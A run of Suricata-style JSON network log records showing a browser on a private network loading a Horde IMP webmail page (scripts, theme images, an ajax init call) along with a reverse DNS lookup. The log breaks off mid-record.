{"timestamp":"2020-02-29T00:27:04.611713+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:27:04.612519+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:27:04.625672+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.669222+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:27:04.780014+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.780291+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:27:04.798054+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.803799+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:27:04.806387+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} {"timestamp":"2020-02-29T00:27:04.807839+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:27:04.809644+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:27:04.811188+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:27:04.812217+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:27:04.816779+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:27:04.817929+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":10}} {"timestamp":"2020-02-29T00:27:04.818165+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.819069+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:27:04.819931+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":11}} {"timestamp":"2020-02-29T00:27:04.831587+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:27:04.843532+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51486,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54972,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.846223+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:27:04.847040+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.847645+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:27:04.874816+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":12}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.071870+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.074175+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":4}} {"timestamp":"2020-02-29T00:27:05.075180+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:27:05.075225+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.075684+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":5}} {"timestamp":"2020-02-29T00:27:05.080128+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:27:05.080803+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:27:05.081294+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":6}} {"timestamp":"2020-02-29T00:27:05.082259+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":14}} {"timestamp":"2020-02-29T00:27:05.082704+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:27:05.081787+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:27:05.082241+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.084761+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:27:05.085232+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":8}} {"timestamp":"2020-02-29T00:27:05.086063+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:27:05.086632+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":9}} {"timestamp":"2020-02-29T00:27:05.087326+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 